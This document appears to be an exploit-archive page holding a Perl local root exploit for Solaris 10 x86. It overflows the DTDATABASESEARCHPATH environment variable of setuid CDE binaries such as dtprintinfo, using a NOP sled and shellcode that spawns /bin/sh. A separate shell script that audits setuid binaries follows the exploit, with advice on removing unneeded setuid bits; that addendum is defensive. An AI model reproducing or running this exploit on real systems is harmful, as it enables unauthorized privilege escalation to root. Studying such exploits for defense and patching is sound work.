Solaris 10 DtPrintinfoSession Local Root Exploit x86

#!/usr/bin/perl
#######################################################################
#
# Solaris 10 DtPrintinfo/Session Exploit (x86)
#
# EDUCATIONAL purposes only.... :-)
#
# by Charles Stevenson (core) <core@bokeoa.com>
#
# greetz to raptor for sharing this vulnerability and in no specific
# order just want to show love for: nemo, andrewg, jduck, bannedit,
# runixd, charbuff, sloth, ktha, KF, akt0r, MRX, salvia, etc.
#
# irc.pulltheplug.org (#social)
# 0dd: much <3 & respect
#
# 10/12/05 - FF local root
#
#######################################################################
#               PRIVATE - DO NOT DISTRIBUTE - PRIVATE                 #
#######################################################################

# You can try lots of dt* suids.  I'm too lazy to code the loop ;-o
$dtsuid = "dtprintinfo";
#$dtsuid = "dtsession";

# NOP sled followed by the shellcode; total length 511 bytes
$sc = "\x90" x (511-108) .

# anathema <anathema@hack.co.za>
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04".
"\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5e".
"\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50".
"\xb0\x8d\xe8\xe0\xff\xff\xff\x29\xc0".
"\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb".
"\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0".
"\x88\x46\x19\x89\x46\x14\x89\x46\x0f".
"\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51".
"\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff".
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01".
"\x01\x01\x01\x02\x02\x02\x02\x03\x03".
"\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

print "\n\n$dtsuid root exploit\n";
print "----------------------------------------------\n";
print "Written by Charles Stevenson <core\@bokeoa.com>\n\n";

# Clear out the environment.
foreach $key (keys %ENV) { delete $ENV{$key}; }

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc";
$ENV{"TERM"} = "xterm";
$ENV{"DISPLAY"} = "127.0.0.1:0";
$ENV{"PATH"} = "/usr/dt/bin:/bin:/sbin:/usr/sbin:/usr/bin";

# Create the payload...
#$ENV{"DTDATABASESEARCHPATH"} = "////" . "ABCD"x360; # raptor
$ENV{"DTDATABASESEARCHPATH"} = "////" . pack("l",0x8047890)x360;


# If you don't get root try other dt setuid binaries
print "Trying to own $dtsuid...\n";
system("/usr/dt/bin/$dtsuid");

# EOF

# milw0rm.com [2005-10-12]
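The listing above targets a setuid CDE helper under /usr/dt/bin, and its header comment notes that several dt* setuid binaries can be tried. The defensive counterpart is knowing which such binaries exist on a host so their setuid bits can be reviewed. The script below is an added example, not part of the original exploit or the author's code: it audits a directory for setuid files. The default directory /usr/dt/bin is taken from the listing; the function names and the file name audit_setuid.sh are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original exploit): audit a directory for setuid
# binaries so the CDE dt* helpers can be found and reviewed. Assumes a POSIX
# find(1); /usr/dt/bin as the default directory is taken from the listing.

# list_setuid DIR : print every regular file under DIR with the setuid bit set,
# one path per line. Empty output means there is nothing to review.
list_setuid() {
    dir="${1:-/usr/dt/bin}"
    [ -d "$dir" ] || return 0
    find "$dir" -type f -perm -4000 2>/dev/null | sort
}

# count_setuid DIR : number of setuid regular files under DIR (0 if none or
# if DIR does not exist).
count_setuid() {
    n=$(list_setuid "$1" | wc -l)
    echo "$n" | tr -d ' '
}

# report_setuid DIR : owner and mode of each hit, so an administrator can
# decide whether the setuid bit is still needed on that program.
report_setuid() {
    dir="${1:-/usr/dt/bin}"
    list_setuid "$dir" | while IFS= read -r f; do
        ls -ld "$f"
    done
}

# Usage when saved as audit_setuid.sh and run directly (argument optional):
#   sh audit_setuid.sh /usr/dt/bin
if [ "${0##*/}" = "audit_setuid.sh" ]; then
    report_setuid "$1"
    echo "setuid binaries found: $(count_setuid "$1")"
fi
```

Each path reported is a privilege boundary: an unprivileged local user can reach its code with root rights, as the exploit does through environment variables. Removing the setuid bit from helpers that are not needed, or dropping unused CDE components altogether, shrinks that boundary.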




Charles Stevenson                                                                        10/12/2005